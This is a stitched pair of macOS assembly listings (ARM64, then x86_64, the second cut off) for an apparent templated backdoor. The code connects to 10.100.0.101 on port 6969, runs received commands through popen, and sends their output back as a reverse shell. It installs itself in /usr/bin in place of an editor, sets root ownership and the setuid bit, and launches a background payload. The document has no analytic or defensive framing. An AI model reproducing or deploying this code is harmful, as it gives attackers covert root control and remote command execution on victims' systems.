.cfi_def_cfa_offset 176
stp x29, x30, [sp, #160] ; 16-byte Folded Spill
add x29, sp, #160
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
bl _getrunningpid
str w0, [sp, #4]
ldr w8, [sp, #4]
adds w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB2_2
b LBB2_1
LBB2_1:
stur wzr, [x29, #-4]
b LBB2_5
LBB2_2:
ldr w0, [sp, #4]
mov w1, #0
str w1, [sp] ; 4-byte Folded Spill
bl _kill
ldr w8, [sp] ; 4-byte Folded Reload
subs w8, w8, w0
cset w8, ne
tbnz w8, #0, LBB2_4
b LBB2_3
LBB2_3:
mov w8, #1
stur w8, [x29, #-4]
b LBB2_5
LBB2_4:
stur wzr, [x29, #-4]
b LBB2_5
LBB2_5:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #160] ; 16-byte Folded Reload
add sp, sp, #176
ret
.cfi_endproc
; -- End function
.globl _establishConnection ; -- Begin function establishConnection
.p2align 2
_establishConnection: ; @establishConnection
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #2192
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str w0, [sp, #112]
str w1, [sp, #108]
mov w8, #0
str w8, [sp, #76] ; 4-byte Folded Spill
str wzr, [sp, #104]
add x0, sp, #1144
mov x1, #1024
bl _bzero
ldr w2, [sp, #76] ; 4-byte Folded Reload
mov w0, #2
mov w1, #1
bl _socket
str w0, [sp, #104]
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB3_2
b LBB3_1
LBB3_1:
mov w8, #-1
str w8, [sp, #116]
b LBB3_23
LBB3_2:
mov w8, #2
sturb w8, [x29, #-39]
b LBB3_3
LBB3_3:
ldr w8, [sp, #112]
and w0, w8, #0xffff
bl __OSSwapInt16
and w8, w0, #0xffff
str w8, [sp, #72] ; 4-byte Folded Spill
b LBB3_4
LBB3_4:
ldr w9, [sp, #72] ; 4-byte Folded Reload
sub x8, x29, #40
sturh w9, [x29, #-38]
add x2, x8, #4
mov w0, #2
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
bl _inet_pton
subs w8, w0, #0
cset w8, gt
tbnz w8, #0, LBB3_6
b LBB3_5
LBB3_5:
mov w8, #-1
str w8, [sp, #116]
b LBB3_23
LBB3_6:
ldr w0, [sp, #104]
sub x1, x29, #40
mov w2, #16
bl _connect
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB3_8
b LBB3_7
LBB3_7:
mov w8, #-1
str w8, [sp, #116]
b LBB3_23
LBB3_8:
ldr w8, [sp, #108]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB3_21
b LBB3_9
LBB3_9:
bl _writepid
adds w8, w0, #1
cset w8, ne
tbnz w8, #0, LBB3_11
b LBB3_10
LBB3_10:
mov w8, #-1
str w8, [sp, #116]
b LBB3_23
LBB3_11:
b LBB3_12
LBB3_12: ; =>This Loop Header: Depth=1
; Child Loop BB3_14 Depth 2
; Child Loop BB3_17 Depth 2
ldr w0, [sp, #104]
add x1, sp, #1144
mov x2, #1024
mov w3, #0
bl _recv
mov x8, x0
mov x9, x0
str w9, [sp, #100]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB3_20
b LBB3_13
LBB3_13: ; in Loop: Header=BB3_12 Depth=1
add x0, sp, #1144
str x0, [sp, #64] ; 8-byte Folded Spill
adrp x1, l_.str.5@PAGE
add x1, x1, l_.str.5@PAGEOFF
bl _strcspn
mov x9, x0
ldr x0, [sp, #64] ; 8-byte Folded Reload
mov x8, x0
add x8, x8, x9
strb wzr, [x8]
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
mov x2, #1024
str x2, [sp, #56] ; 8-byte Folded Spill
bl ___strcat_chk
ldr x2, [sp, #56] ; 8-byte Folded Reload
ldr x0, [sp, #64] ; 8-byte Folded Reload
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl ___strcat_chk
ldr x0, [sp, #64] ; 8-byte Folded Reload
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _popen
str x0, [sp, #88]
b LBB3_14
LBB3_14: ; Parent Loop BB3_12 Depth=1
; => This Inner Loop Header: Depth=2
ldr x2, [sp, #88]
add x0, sp, #120
mov w1, #1024
bl _fgets
subs x8, x0, #0
cset w8, eq
tbnz w8, #0, LBB3_16
b LBB3_15
LBB3_15: ; in Loop: Header=BB3_14 Depth=2
ldr w8, [sp, #104]
str w8, [sp, #52] ; 4-byte Folded Spill
add x0, sp, #120
str x0, [sp, #40] ; 8-byte Folded Spill
bl _strlen
ldr x1, [sp, #40] ; 8-byte Folded Reload
mov x2, x0
ldr w0, [sp, #52] ; 4-byte Folded Reload
bl _write
b LBB3_14
LBB3_16: ; in Loop: Header=BB3_12 Depth=1
adrp x0, l_.str.7@PAGE
add x0, x0, l_.str.7@PAGEOFF
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _fopen
str x0, [sp, #80]
b LBB3_17
LBB3_17: ; Parent Loop BB3_12 Depth=1
; => This Inner Loop Header: Depth=2
ldr x2, [sp, #80]
add x0, sp, #120
mov w1, #1024
bl _fgets
subs x8, x0, #0
cset w8, eq
tbnz w8, #0, LBB3_19
b LBB3_18
LBB3_18: ; in Loop: Header=BB3_17 Depth=2
ldr w8, [sp, #104]
str w8, [sp, #36] ; 4-byte Folded Spill
add x0, sp, #120
str x0, [sp, #24] ; 8-byte Folded Spill
bl _strlen
ldr x1, [sp, #24] ; 8-byte Folded Reload
mov x2, x0
ldr w0, [sp, #36] ; 4-byte Folded Reload
bl _write
b LBB3_17
LBB3_19: ; in Loop: Header=BB3_12 Depth=1
adrp x0, l_.str.7@PAGE
add x0, x0, l_.str.7@PAGEOFF
bl _remove
b LBB3_12
LBB3_20:
b LBB3_22
LBB3_21:
ldr w0, [sp, #104]
add x1, sp, #1144
str x1, [sp, #16] ; 8-byte Folded Spill
mov x2, #1024
bl _read
mov x8, x0
ldr x0, [sp, #16] ; 8-byte Folded Reload
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #100]
bl _atoi
mov w1, #1
bl _establishConnection
b LBB3_22
LBB3_22:
str wzr, [sp, #116]
b LBB3_23
LBB3_23:
ldr w8, [sp, #116]
str w8, [sp, #12] ; 4-byte Folded Spill
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB3_25
b LBB3_24
LBB3_24:
bl ___stack_chk_fail
LBB3_25:
ldr w0, [sp, #12] ; 4-byte Folded Reload
add sp, sp, #2192
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function _OSSwapInt16
__OSSwapInt16: ; @_OSSwapInt16
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
strh w0, [sp, #14]
ldrh w9, [sp, #14]
ldrh w8, [sp, #14]
asr w8, w8, #8
orr w8, w8, w9, lsl #8
and w0, w8, #0xffff
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _install ; -- Begin function install
.p2align 2
_install: ; @install
.cfi_startproc
; %bb.0:
sub sp, sp, #272
.cfi_def_cfa_offset 272
stp x28, x27, [sp, #240] ; 16-byte Folded Spill
stp x29, x30, [sp, #256] ; 16-byte Folded Spill
add x29, sp, #256
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str x0, [sp, #64]
ldr x8, [sp, #64]
add x8, x8, #2
str x8, [sp, #56]
sub x0, x29, #74
str x0, [sp, #48] ; 8-byte Folded Spill
adrp x1, l___const.install.path@PAGE
add x1, x1, l___const.install.path@PAGEOFF
mov x2, #50
str x2, [sp, #40] ; 8-byte Folded Spill
bl _memcpy
ldr x0, [sp, #48] ; 8-byte Folded Reload
ldr x2, [sp, #40] ; 8-byte Folded Reload
adrp x1, l_.str.8@PAGE
add x1, x1, l_.str.8@PAGEOFF
bl ___strcat_chk
ldr x0, [sp, #48] ; 8-byte Folded Reload
mov w1, #0
bl _access
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB5_2
b LBB5_1
LBB5_1:
str wzr, [sp, #76]
b LBB5_3
LBB5_2:
sub x0, x29, #124
str x0, [sp, #8] ; 8-byte Folded Spill
adrp x1, l___const.install.newpath@PAGE
add x1, x1, l___const.install.newpath@PAGEOFF
mov x2, #50
str x2, [sp, #24] ; 8-byte Folded Spill
bl _memcpy
ldr x0, [sp, #8] ; 8-byte Folded Reload
ldr x2, [sp, #24] ; 8-byte Folded Reload
adrp x1, l_.str.8@PAGE
add x1, x1, l_.str.8@PAGEOFF
bl ___strcat_chk
ldr x1, [sp, #8] ; 8-byte Folded Reload
adrp x0, l_.str.9@PAGE
add x0, x0, l_.str.9@PAGEOFF
str x0, [sp, #16] ; 8-byte Folded Spill
bl _rename
ldr x1, [sp, #16] ; 8-byte Folded Reload
ldr x0, [sp, #56]
bl _rename
ldr x0, [sp, #16] ; 8-byte Folded Reload
mov w2, #0
mov x1, x2
bl _chown
ldr x2, [sp, #24] ; 8-byte Folded Reload
add x0, sp, #82
str x0, [sp, #32] ; 8-byte Folded Spill
adrp x1, l___const.install.cmd@PAGE
add x1, x1, l___const.install.cmd@PAGEOFF
bl _memcpy
ldr x0, [sp, #32] ; 8-byte Folded Reload
ldr x1, [sp, #16] ; 8-byte Folded Reload
ldr x2, [sp, #24] ; 8-byte Folded Reload
bl ___strcat_chk
ldr x0, [sp, #32] ; 8-byte Folded Reload
bl _system
adrp x0, l_.str.10@PAGE
add x0, x0, l_.str.10@PAGEOFF
bl _printf
mov w8, #1
str w8, [sp, #76]
b LBB5_3
LBB5_3:
ldr w8, [sp, #76]
str w8, [sp, #4] ; 4-byte Folded Spill
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB5_5
b LBB5_4
LBB5_4:
bl ___stack_chk_fail
LBB5_5:
ldr w0, [sp, #4] ; 4-byte Folded Reload
ldp x29, x30, [sp, #256] ; 16-byte Folded Reload
ldp x28, x27, [sp, #240] ; 16-byte Folded Reload
add sp, sp, #272
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #400
.cfi_def_cfa_offset 400
stp x28, x27, [sp, #368] ; 16-byte Folded Spill
stp x29, x30, [sp, #384] ; 16-byte Folded Spill
add x29, sp, #384
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
mov x8, x0
adrp x9, ___stack_chk_guard@GOTPAGE
ldr x9, [x9, ___stack_chk_guard@GOTPAGEOFF]
ldr x9, [x9]
stur x9, [x29, #-24]
mov w0, #0
str wzr, [sp, #104]
str w8, [sp, #100]
str x1, [sp, #88]
bl _setuid
ldr x8, [sp, #88]
ldr x0, [x8]
bl _install
subs w8, w0, #1
cset w8, ne
tbnz w8, #0, LBB6_2
b LBB6_1
LBB6_1:
str wzr, [sp, #104]
b LBB6_13
LBB6_2:
sub x0, x29, #124
str x0, [sp, #64] ; 8-byte Folded Spill
adrp x1, l___const.main.args@PAGE
add x1, x1, l___const.main.args@PAGEOFF
mov x2, #100
str x2, [sp, #72] ; 8-byte Folded Spill
bl _memcpy
ldr x0, [sp, #64] ; 8-byte Folded Reload
ldr x2, [sp, #72] ; 8-byte Folded Reload
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl ___strcat_chk
mov w8, #1
str w8, [sp, #84]
b LBB6_3
LBB6_3: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #84]
ldr w9, [sp, #100]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB6_8
b LBB6_4
LBB6_4: ; in Loop: Header=BB6_3 Depth=1
ldr x8, [sp, #88]
ldrsw x9, [sp, #84]
ldr x1, [x8, x9, lsl #3]
sub x0, x29, #124
mov x2, #100
bl ___strcat_chk
ldr w8, [sp, #84]
ldr w9, [sp, #100]
subs w9, w9, #1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB6_6
b LBB6_5
LBB6_5: ; in Loop: Header=BB6_3 Depth=1
sub x0, x29, #124
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
mov x2, #100
bl ___strcat_chk
b LBB6_6
LBB6_6: ; in Loop: Header=BB6_3 Depth=1
b LBB6_7
LBB6_7: ; in Loop: Header=BB6_3 Depth=1
ldr w8, [sp, #84]
add w8, w8, #1
str w8, [sp, #84]
b LBB6_3
LBB6_8:
adrp x0, l_.str.12@PAGE
add x0, x0, l_.str.12@PAGEOFF
mov w1, #0
bl _access
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB6_10
b LBB6_9
LBB6_9:
sub x0, x29, #174
str x0, [sp, #40] ; 8-byte Folded Spill
mov w1, #0
str w1, [sp, #16] ; 4-byte Folded Spill
mov x2, #50
str x2, [sp, #32] ; 8-byte Folded Spill
bl _memset
ldr x2, [sp, #32] ; 8-byte Folded Reload
mov w8, #99
sturb w8, [x29, #-174]
mov w8, #112
sturb w8, [x29, #-173]
mov w8, #32
str w8, [sp, #20] ; 4-byte Folded Spill
sturb w8, [x29, #-172]
add x0, sp, #160
str x0, [sp, #48] ; 8-byte Folded Spill
adrp x1, l___const.main.cmd2@PAGE
add x1, x1, l___const.main.cmd2@PAGEOFF
bl _memcpy
ldr w1, [sp, #16] ; 4-byte Folded Reload
ldr x2, [sp, #32] ; 8-byte Folded Reload
add x0, sp, #110
str x0, [sp, #56] ; 8-byte Folded Spill
bl _memset
ldr x0, [sp, #40] ; 8-byte Folded Reload
ldr w8, [sp, #20] ; 4-byte Folded Reload
ldr x2, [sp, #32] ; 8-byte Folded Reload
mov w9, #114
strb w9, [sp, #110]
mov w9, #109
strb w9, [sp, #111]
strb w8, [sp, #112]
mov w9, #45
strb w9, [sp, #113]
mov w9, #102
strb w9, [sp, #114]
strb w8, [sp, #115]
adrp x1, l_.str.9@PAGE
add x1, x1, l_.str.9@PAGEOFF
bl ___strcat_chk
ldr x2, [sp, #32] ; 8-byte Folded Reload
ldr x0, [sp, #40] ; 8-byte Folded Reload
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl ___strcat_chk
ldr x2, [sp, #32] ; 8-byte Folded Reload
ldr x0, [sp, #40] ; 8-byte Folded Reload
adrp x1, l_.str.12@PAGE
add x1, x1, l_.str.12@PAGEOFF
str x1, [sp, #24] ; 8-byte Folded Spill
bl ___strcat_chk
ldr x2, [sp, #32] ; 8-byte Folded Reload
ldr x0, [sp, #48] ; 8-byte Folded Reload
adrp x1, l_.str.13@PAGE
add x1, x1, l_.str.13@PAGEOFF
bl ___strcat_chk
ldr x1, [sp, #24] ; 8-byte Folded Reload
ldr x2, [sp, #32] ; 8-byte Folded Reload
ldr x0, [sp, #56] ; 8-byte Folded Reload
bl ___strcat_chk
ldr x0, [sp, #40] ; 8-byte Folded Reload
bl _system
ldr x0, [sp, #48] ; 8-byte Folded Reload
bl _system
mov w0, #0
bl _sleep
ldr x0, [sp, #56] ; 8-byte Folded Reload
bl _system
sub x0, x29, #124
bl _system
b LBB6_13
LBB6_10:
bl _testpid
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB6_12
b LBB6_11
LBB6_11:
mov w0, #6969
mov w1, #0
bl _establishConnection
str w0, [sp, #104]
b LBB6_13
LBB6_12:
b LBB6_13
LBB6_13:
ldr w8, [sp, #104]
str w8, [sp, #12] ; 4-byte Folded Spill
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB6_15
b LBB6_14
LBB6_14:
bl ___stack_chk_fail
LBB6_15:
ldr w0, [sp, #12] ; 4-byte Folded Reload
ldp x29, x30, [sp, #384] ; 16-byte Folded Reload
ldp x28, x27, [sp, #368] ; 16-byte Folded Reload
add sp, sp, #400
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "{STATUS}"
l_.str.1: ; @.str.1
.asciz "w"
l_.str.2: ; @.str.2
.asciz "%d"
l_.str.3: ; @.str.3
.asciz "r"
l_.str.4: ; @.str.4
.asciz "10.100.0.101"
l_.str.5: ; @.str.5
.asciz "\n"
l_.str.6: ; @.str.6
.asciz " 2>"
l_.str.7: ; @.str.7
.asciz "{ERROR}"
.section __TEXT,__const
l___const.install.path: ; @__const.install.path
.asciz "/usr/bin/\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.section __TEXT,__cstring,cstring_literals
l_.str.8: ; @.str.8
.asciz "{BINARYNAME}"
.section __TEXT,__const
l___const.install.newpath: ; @__const.install.newpath
.asciz "/usr/bin/\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.section __TEXT,__cstring,cstring_literals
l_.str.9: ; @.str.9
.asciz "{EDITOR}"
.section __TEXT,__const
l___const.install.cmd: ; @__const.install.cmd
.asciz "chmod +s \000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.section __TEXT,__cstring,cstring_literals
l_.str.10: ; @.str.10
.asciz "Installed\n"
.section __TEXT,__const
l___const.main.args: ; @__const.main.args
.asciz "{BINARYNAME}\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.section __TEXT,__cstring,cstring_literals
l_.str.11: ; @.str.11
.asciz " "
l_.str.12: ; @.str.12
.asciz "{PAYLOAD}"
.section __TEXT,__const
l___const.main.cmd2: ; @__const.main.cmd2
.asciz "{PAYLOAD}\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.section __TEXT,__cstring,cstring_literals
l_.str.13: ; @.str.13
.asciz " &"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _writepid ## -- Begin function writepid
.p2align 4, 0x90
_writepid: ## @writepid
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
callq _getpid
movl %eax, -20(%rbp)
leaq L_.str(%rip), %rdi
leaq L_.str.1(%rip), %rsi
callq _fopen
movq %rax, -16(%rbp)
cmpq $0, %rax
jne LBB0_2
## %bb.1:
movl $-1, -4(%rbp)
jmp LBB0_3
LBB0_2:
movq -16(%rbp), %rdi
movl -20(%rbp), %edx
leaq L_.str.2(%rip), %rsi
movb $0, %al
callq _fprintf
movq -16(%rbp), %rdi
callq _fclose
movl $1, -4(%rbp)
LBB0_3:
movl -4(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _getrunningpid ## -- Begin function getrunningpid
.p2align 4, 0x90
_getrunningpid: ## @getrunningpid
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
leaq L_.str(%rip), %rdi
leaq L_.str.3(%rip), %rsi
callq _fopen
movq %rax, -16(%rbp)
cmpq $0, %rax
jne LBB1_2
## %bb.1:
movl $-1, -4(%rbp)
jmp LBB1_3
LBB1_2:
movq -16(%rbp), %rdi
leaq L_.str.2(%rip), %rsi
leaq -8(%rbp), %rdx
movb $0, %al
callq _fscanf
movq -16(%rbp), %rdi
callq _fclose
movl -8(%rbp), %eax
movl %eax, -4(%rbp)
LBB1_3:
movl -4(%rbp), %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _testpid ## -- Begin function testpid
.p2align 4, 0x90
_testpid: ## @testpid
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $160, %rsp
callq _getrunningpid
movl %eax, -156(%rbp)
cmpl $-1, -156(%rbp)
jne LBB2_2
## %bb.1:
movl $0, -4(%rbp)
jmp LBB2_5
LBB2_2:
movl -156(%rbp), %edi
xorl %esi, %esi
callq _kill
movl %eax, %ecx
xorl %eax, %eax
cmpl %ecx, %eax
jne LBB2_4
## %bb.3:
movl $1, -4(%rbp)
jmp LBB2_5
LBB2_4:
movl $0, -4(%rbp)
LBB2_5:
movl -4(%rbp), %eax
addq $160, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _establishConnection ## -- Begin function establishConnection
.p2align 4, 0x90
_establishConnection: ## @establishConnection
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $2160, %rsp ## imm = 0x870
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl %edi, -2088(%rbp)
movl %esi, -2092(%rbp)
movl $0, -2096(%rbp)
leaq -1056(%rbp), %rdi
xorl %esi, %esi
movl $1024, %edx ## imm = 0x400
callq _memset
movl $2, %edi
movl $1, %esi
xorl %edx, %edx
callq _socket
movl %eax, -2096(%rbp)
cmpl $0, %eax
jge LBB3_2
## %bb.1:
movl $-1, -2084(%rbp)
jmp LBB3_23
LBB3_2:
movb $2, -23(%rbp)
## %bb.3:
movl -2088(%rbp), %eax
## kill: def $ax killed $ax killed $eax
movzwl %ax, %edi
callq __OSSwapInt16
movzwl %ax, %eax
movl %eax, -2124(%rbp) ## 4-byte Spill
## %bb.4:
movl -2124(%rbp), %eax ## 4-byte Reload
movw %ax, -22(%rbp)
leaq -24(%rbp), %rdx
addq $4, %rdx
movl $2, %edi
leaq L_.str.4(%rip), %rsi
callq _inet_pton
cmpl $0, %eax
jg LBB3_6
## %bb.5:
movl $-1, -2084(%rbp)
jmp LBB3_23
LBB3_6:
movl -2096(%rbp), %edi
leaq -24(%rbp), %rsi
movl $16, %edx
callq _connect
cmpl $0, %eax
jge LBB3_8
## %bb.7:
movl $-1, -2084(%rbp)
jmp LBB3_23
LBB3_8:
cmpl $1, -2092(%rbp)
jne LBB3_21
## %bb.9:
callq _writepid
cmpl $-1, %eax
jne LBB3_11
## %bb.10:
movl $-1, -2084(%rbp)
jmp LBB3_23
LBB3_11:
jmp LBB3_12
LBB3_12: ## =>This Loop Header: Depth=1
## Child Loop BB3_14 Depth 2
## Child Loop BB3_17 Depth 2
movl -2096(%rbp), %edi
leaq -1056(%rbp), %rsi
movl $1024, %edx ## imm = 0x400
xorl %ecx, %ecx
callq _recv
## kill: def $eax killed $eax killed $rax
movl %eax, -2100(%rbp)
cmpl $0, %eax
jle LBB3_20
## %bb.13: ## in Loop: Header=BB3_12 Depth=1
leaq -1056(%rbp), %rdi
leaq L_.str.5(%rip), %rsi
callq _strcspn
movb $0, -1056(%rbp,%rax)
leaq -1056(%rbp), %rdi
leaq L_.str.6(%rip), %rsi
movl $1024, %edx ## imm = 0x400
callq ___strcat_chk
leaq -1056(%rbp), %rdi
leaq L_.str.7(%rip), %rsi
movl $1024, %edx ## imm = 0x400
callq ___strcat_chk
leaq -1056(%rbp), %rdi
leaq L_.str.3(%rip), %rsi
callq _popen
movq %rax, -2112(%rbp)
LBB3_14: ## Parent Loop BB3_12 Depth=1
## => This Inner Loop Header: Depth=2
leaq -2080(%rbp), %rdi
movq -2112(%rbp), %rdx
movl $1024, %esi ## imm = 0x400
callq _fgets
cmpq $0, %rax
je LBB3_16
## %bb.15: ## in Loop: Header=BB3_14 Depth=2
movl -2096(%rbp), %eax
movl %eax, -2140(%rbp) ## 4-byte Spill
leaq -2080(%rbp), %rax
movq %rax, -2136(%rbp) ## 8-byte Spill
leaq -2080(%rbp), %rdi
callq _strlen
movl -2140(%rbp), %edi ## 4-byte Reload
movq -2136(%rbp), %rsi ## 8-byte Reload
movq %rax, %rdx
callq _write
jmp LBB3_14
LBB3_16: ## in Loop: Header=BB3_12 Depth=1
leaq L_.str.7(%rip), %rdi
leaq L_.str.3(%rip), %rsi
callq _fopen
movq %rax, -2120(%rbp)
LBB3_17: ## Parent Loop BB3_12 Depth=1
## => This Inner Loop Header: Depth=2
leaq -2080(%rbp), %rdi
movq -2120(%rbp), %rdx
movl $1024, %esi ## imm = 0x400
callq _fgets
cmpq $0, %rax
je LBB3_19
## %bb.18: ## in Loop: Header=BB3_17 Depth=2
movl -2096(%rbp), %eax
movl %eax, -2156(%rbp) ## 4-byte Spill
leaq -2080(%rbp), %rax
movq %rax, -2152(%rbp) ## 8-byte Spill
leaq -2080(%rbp), %rdi
callq _strlen
movl -2156(%rbp), %edi ## 4-byte Reload
movq -2152(%rbp), %rsi ## 8-byte Reload
movq %rax, %rdx
callq _write
jmp LBB3_17
LBB3_19: ## in Loop: Header=BB3_12 Depth=1
leaq L_.str.7(%rip), %rdi
callq _remove
jmp LBB3_12
LBB3_20:
jmp LBB3_22
LBB3_21:
movl -2096(%rbp), %edi
leaq -1056(%rbp), %rsi
movl $1024, %edx ## imm = 0x400
callq _read
## kill: def $eax killed $eax killed $rax
movl %eax, -2100(%rbp)
leaq -1056(%rbp), %rdi
callq _atoi
movl %eax, %edi
movl $1, %esi
callq _establishConnection
LBB3_22:
movl $0, -2084(%rbp)
LBB3_23:
movl -2084(%rbp), %eax
movl %eax, -2160(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB3_25
## %bb.24:
movl -2160(%rbp), %eax ## 4-byte Reload
addq $2160, %rsp ## imm = 0x870
popq %rbp
retq
LBB3_25:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function _OSSwapInt16
__OSSwapInt16: ## @_OSSwapInt16
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movw %di, %ax
movw %ax, -2(%rbp)
movzwl -2(%rbp), %eax
shll $8, %eax
movzwl -2(%rbp), %ecx
sarl $8, %ecx
orl %ecx, %eax
## kill: def $ax killed $ax killed $eax
movzwl %ax, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _install ## -- Begin function install
.p2align 4, 0x90
_install: ## @install
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $224, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -208(%rbp)
movq -208(%rbp), %rax
addq $2, %rax
movq %rax, -216(%rbp)
leaq -64(%rbp), %rdi
leaq l___const.install.path(%rip), %rsi
movl $50, %edx
callq _memcpy
leaq -64(%rbp), %rdi
leaq L_.str.8(%rip), %rsi
movl $50, %edx
callq ___strcat_chk
leaq -64(%rbp), %rdi
xorl %esi, %esi
callq _access
cmpl $0, %eax
jne LBB5_2
## %bb.1:
movl $0, -196(%rbp)
jmp LBB5_3
LBB5_2:
leaq -128(%rbp), %rdi
leaq l___const.install.newpath(%rip), %rsi
movl $50, %edx
callq _memcpy
leaq -128(%rbp), %rdi
leaq L_.str.8(%rip), %rsi
movl $50, %edx
callq ___strcat_chk
leaq -128(%rbp), %rsi
leaq L_.str.9(%rip), %rdi
callq _rename
movq -216(%rbp), %rdi
leaq L_.str.9(%rip), %rsi
callq _rename
leaq L_.str.9(%rip), %rdi
xorl %edx, %edx
movl %edx, %esi
callq _chown
leaq -192(%rbp), %rdi
leaq l___const.install.cmd(%rip), %rsi
movl $50, %edx
callq _memcpy
leaq -192(%rbp), %rdi
leaq L_.str.9(%rip), %rsi
movl $50, %edx
callq ___strcat_chk
leaq -192(%rbp), %rdi
callq _system
leaq L_.str.10(%rip), %rdi
movb $0, %al
callq _printf
